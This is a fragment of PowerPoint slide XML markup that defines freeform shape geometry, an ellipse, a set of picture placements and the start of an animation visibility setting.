                    <a:pt x="86" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="A8A8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2" name="Freeform 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6A04FF7-1BE3-40CF-87CD-EC59229D77D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="274" cy="103"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 274"/>
                <a:gd name="T1" fmla="*/ 103 h 103"/>
                <a:gd name="T2" fmla="*/ 0 w 274"/>
                <a:gd name="T3" fmla="*/ 66 h 103"/>
                <a:gd name="T4" fmla="*/ 86 w 274"/>
                <a:gd name="T5" fmla="*/ 0 h 103"/>
                <a:gd name="T6" fmla="*/ 274 w 274"/>
                <a:gd name="T7" fmla="*/ 37 h 103"/>
                <a:gd name="T8" fmla="*/ 188 w 274"/>
                <a:gd name="T9" fmla="*/ 103 h 103"/>
                <a:gd name="T10" fmla="*/ 188 w 274"/>
                <a:gd name="T11" fmla="*/ 103 h 103"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 274"/>
                <a:gd name="T19" fmla="*/ 0 h 103"/>
                <a:gd name="T20" fmla="*/ 274 w 274"/>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274" h="103">
                  <a:moveTo>
                    <a:pt x="188" y="103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="103"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C8C7D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3" name="Freeform 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B168AC36-C994-4C03-9D6B-21760F2F0179}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="16" y="86"/>
              <a:ext cx="148" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 148 w 148"/>
                <a:gd name="T1" fmla="*/ 29 h 62"/>
                <a:gd name="T2" fmla="*/ 0 w 148"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 148"/>
                <a:gd name="T5" fmla="*/ 33 h 62"/>
                <a:gd name="T6" fmla="*/ 148 w 148"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 148 w 148"/>
                <a:gd name="T9" fmla="*/ 29 h 62"/>
                <a:gd name="T10" fmla="*/ 148 w 148"/>
                <a:gd name="T11" fmla="*/ 29 h 62"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 148"/>
                <a:gd name="T19" fmla="*/ 0 h 62"/>
                <a:gd name="T20" fmla="*/ 148 w 148"/>
                <a:gd name="T21" fmla="*/ 62 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="148" h="62">
                  <a:moveTo>
                    <a:pt x="148" y="29"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="29"/>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4" name="Freeform 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DEAA5B-7C6C-4D75-8C7E-BBD31770B8FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="49" y="123"/>
              <a:ext cx="192" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 192"/>
                <a:gd name="T1" fmla="*/ 176 h 209"/>
                <a:gd name="T2" fmla="*/ 135 w 192"/>
                <a:gd name="T3" fmla="*/ 209 h 209"/>
                <a:gd name="T4" fmla="*/ 160 w 192"/>
                <a:gd name="T5" fmla="*/ 193 h 209"/>
                <a:gd name="T6" fmla="*/ 160 w 192"/>
                <a:gd name="T7" fmla="*/ 21 h 209"/>
                <a:gd name="T8" fmla="*/ 192 w 192"/>
                <a:gd name="T9" fmla="*/ 0 h 209"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 192"/>
                <a:gd name="T16" fmla="*/ 0 h 209"/>
                <a:gd name="T17" fmla="*/ 192 w 192"/>
                <a:gd name="T18" fmla="*/ 209 h 209"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="192" h="209">
                  <a:moveTo>
                    <a:pt x="0" y="176"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192"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95" name="Freeform 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0394C3E8-6002-4A02-9111-1480F017A279}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="233" y="111"/>
              <a:ext cx="29" cy="28"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 29"/>
                <a:gd name="T1" fmla="*/ 12 h 28"/>
                <a:gd name="T2" fmla="*/ 4 w 29"/>
                <a:gd name="T3" fmla="*/ 4 h 28"/>
                <a:gd name="T4" fmla="*/ 16 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 25 w 29"/>
                <a:gd name="T7" fmla="*/ 4 h 28"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 12 h 28"/>
                <a:gd name="T10" fmla="*/ 25 w 29"/>
                <a:gd name="T11" fmla="*/ 24 h 28"/>
                <a:gd name="T12" fmla="*/ 16 w 29"/>
                <a:gd name="T13" fmla="*/ 28 h 28"/>
                <a:gd name="T14" fmla="*/ 4 w 29"/>
                <a:gd name="T15" fmla="*/ 24 h 28"/>
                <a:gd name="T16" fmla="*/ 0 w 29"/>
                <a:gd name="T17" fmla="*/ 12 h 28"/>
                <a:gd name="T18" fmla="*/ 0 w 29"/>
                <a:gd name="T19" fmla="*/ 12 h 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8"/>
                <a:gd name="T32" fmla="*/ 29 w 29"/>
                <a:gd name="T33" fmla="*/ 28 h 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8">
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="24"/>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6" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2664B59F-FC1E-49B2-8948-C2DA7BF4BD20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="237" y="172"/>
              <a:ext cx="29" cy="29"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 29"/>
                <a:gd name="T1" fmla="*/ 17 h 29"/>
                <a:gd name="T2" fmla="*/ 4 w 29"/>
                <a:gd name="T3" fmla="*/ 4 h 29"/>
                <a:gd name="T4" fmla="*/ 16 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 29"/>
                <a:gd name="T6" fmla="*/ 25 w 29"/>
                <a:gd name="T7" fmla="*/ 4 h 29"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 17 h 29"/>
                <a:gd name="T10" fmla="*/ 25 w 29"/>
                <a:gd name="T11" fmla="*/ 25 h 29"/>
                <a:gd name="T12" fmla="*/ 16 w 29"/>
                <a:gd name="T13" fmla="*/ 29 h 29"/>
                <a:gd name="T14" fmla="*/ 4 w 29"/>
                <a:gd name="T15" fmla="*/ 25 h 29"/>
                <a:gd name="T16" fmla="*/ 0 w 29"/>
                <a:gd name="T17" fmla="*/ 17 h 29"/>
                <a:gd name="T18" fmla="*/ 0 w 29"/>
                <a:gd name="T19" fmla="*/ 17 h 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
                <a:gd name="T31" fmla="*/ 0 h 29"/>
                <a:gd name="T32" fmla="*/ 29 w 29"/>
                <a:gd name="T33" fmla="*/ 29 h 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 h="29">
                  <a:moveTo>
                    <a:pt x="0" y="17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="25"/>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7" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77DFBF37-D352-4A41-82E2-9428CDF6A6B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="49" y="180"/>
              <a:ext cx="200" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 200"/>
                <a:gd name="T1" fmla="*/ 181 h 209"/>
                <a:gd name="T2" fmla="*/ 135 w 200"/>
                <a:gd name="T3" fmla="*/ 209 h 209"/>
                <a:gd name="T4" fmla="*/ 200 w 200"/>
                <a:gd name="T5" fmla="*/ 168 h 209"/>
                <a:gd name="T6" fmla="*/ 200 w 200"/>
                <a:gd name="T7" fmla="*/ 0 h 209"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 60000 65536"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 0 h 209"/>
                <a:gd name="T14" fmla="*/ 200 w 200"/>
                <a:gd name="T15" fmla="*/ 209 h 209"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T8">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T9">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T10">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T12" t="T13" r="T14" b="T15"/>
              <a:pathLst>
                <a:path w="200" h="209">
                  <a:moveTo>
                    <a:pt x="0" y="181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="6350" cmpd="sng">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85398" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13646A20-12F5-4D49-89DA-C293BCC06EA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="33" y="344"/>
              <a:ext cx="33" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 33"/>
                <a:gd name="T1" fmla="*/ 17 h 33"/>
                <a:gd name="T2" fmla="*/ 4 w 33"/>
                <a:gd name="T3" fmla="*/ 4 h 33"/>
                <a:gd name="T4" fmla="*/ 16 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 33"/>
                <a:gd name="T6" fmla="*/ 28 w 33"/>
                <a:gd name="T7" fmla="*/ 4 h 33"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 17 h 33"/>
                <a:gd name="T10" fmla="*/ 28 w 33"/>
                <a:gd name="T11" fmla="*/ 29 h 33"/>
                <a:gd name="T12" fmla="*/ 16 w 33"/>
                <a:gd name="T13" fmla="*/ 33 h 33"/>
                <a:gd name="T14" fmla="*/ 4 w 33"/>
                <a:gd name="T15" fmla="*/ 29 h 33"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 17 h 33"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>
                <a:gd name="T19" fmla="*/ 17 h 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3"/>
                <a:gd name="T32" fmla="*/ 33 w 33"/>
                <a:gd name="T33" fmla="*/ 33 h 3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3">
                  <a:moveTo>
                    <a:pt x="0" y="17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="29"/>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5399" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BCA4786-6678-4112-969F-6FDA17075ACC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="33" y="283"/>
              <a:ext cx="33" cy="37"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 33"/>
                <a:gd name="T1" fmla="*/ 20 h 37"/>
                <a:gd name="T2" fmla="*/ 4 w 33"/>
                <a:gd name="T3" fmla="*/ 4 h 37"/>
                <a:gd name="T4" fmla="*/ 16 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 37"/>
                <a:gd name="T6" fmla="*/ 28 w 33"/>
                <a:gd name="T7" fmla="*/ 4 h 37"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 20 h 37"/>
                <a:gd name="T10" fmla="*/ 28 w 33"/>
                <a:gd name="T11" fmla="*/ 33 h 37"/>
                <a:gd name="T12" fmla="*/ 16 w 33"/>
                <a:gd name="T13" fmla="*/ 37 h 37"/>
                <a:gd name="T14" fmla="*/ 4 w 33"/>
                <a:gd name="T15" fmla="*/ 33 h 37"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 20 h 37"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>
                <a:gd name="T19" fmla="*/ 20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37"/>
                <a:gd name="T32" fmla="*/ 33 w 33"/>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37">
                  <a:moveTo>
                    <a:pt x="0" y="20"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2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6193" name="Oval 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCF9F832-8053-4015-B41D-1A57D5CCA1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="5181600"/>
            <a:ext cx="1828800" cy="1198563"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="185366" name="Picture 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D176DA68-8B01-4081-AC66-60FD61A8F624}"/>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148388" y="2493963"/>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7" name="Picture 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C99D8F-031A-43F8-A643-4A83B0EC496A}"/>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453188" y="2493963"/>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8" name="Picture 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B458F97-45A1-4341-8B9B-72E08DE471CA}"/>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148388" y="2166938"/>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9" name="Picture 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C2C31A9-35C6-44F9-9E6D-882D6258B328}"/>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453188" y="2166938"/>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0" name="Picture 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{392620C1-309E-4B19-9D2D-99738C2D7C6F}"/>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34000" y="1776413"/>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1" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FBB69E-9C8C-40A4-9960-3CBCD44E36D5}"/>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38800" y="1776413"/>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2" name="Picture 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9A8712A-0A33-4933-B1A2-70D690F1A549}"/>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334000" y="1449388"/>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3" name="Picture 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F142B33-AF3D-4FA4-A097-B5423BDFEC43}"/>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38800" y="1449388"/>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4" name="Picture 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC23C901-0541-429B-A43F-4B417DAE36DF}"/>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143000" y="1928813"/>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5" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DDCADC4-CF16-4C33-A0D1-430DEA9D405B}"/>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7800" y="1928813"/>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6" name="Picture 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{594E8ABD-D95B-4393-9451-7CE40657EC55}"/>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143000" y="1601788"/>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7" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362C65D0-DEE3-4189-8DBF-85C7A2E7AD24}"/>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447800" y="1601788"/>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8" name="Picture 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49048EEA-A5D8-46EC-9B59-97BA1C278B6D}"/>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033588" y="1503363"/>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79" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4228ACEA-3E15-44AF-8CD3-55FABCFC0965}"/>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38388" y="1503363"/>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0" name="Picture 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2752A8E-9103-41EB-B95B-A9872E8C60F5}"/>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033588" y="1176338"/>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1" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E21971AA-5CA1-430D-9120-86C5E1B6082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2338388" y="1176338"/>
            <a:ext cx="3286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2" name="Picture 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C089831A-8A89-4911-93E0-AE8A7FB61007}"/>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14400" y="6249988"/>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3" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3BF13E2-9AF4-413B-9A8E-8349BEF56A22}"/>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19200" y="6249988"/>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4" name="Picture 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D07A844-126B-4E78-9994-A4409B265057}"/>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914400" y="5922963"/>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5" name="Picture 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76673DF7-0114-4936-A92E-B3954ACE013D}"/>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19200" y="5922963"/>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6" name="Picture 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55136E5F-CA10-431D-B673-3D0FF0EF4A7E}"/>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2400" y="5616575"/>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7" name="Picture 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5527042F-52A2-4373-A39B-95CA1E9299BB}"/>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7200" y="5616575"/>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8" name="Picture 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D2D51BC-CF60-4B61-BB29-9F13BDE98081}"/>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2400" y="5289550"/>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89" name="Picture 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC2BB60-3F0A-42C0-A9D6-988854F18473}"/>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57200" y="5289550"/>
            <a:ext cx="3286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50"/>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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6172"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
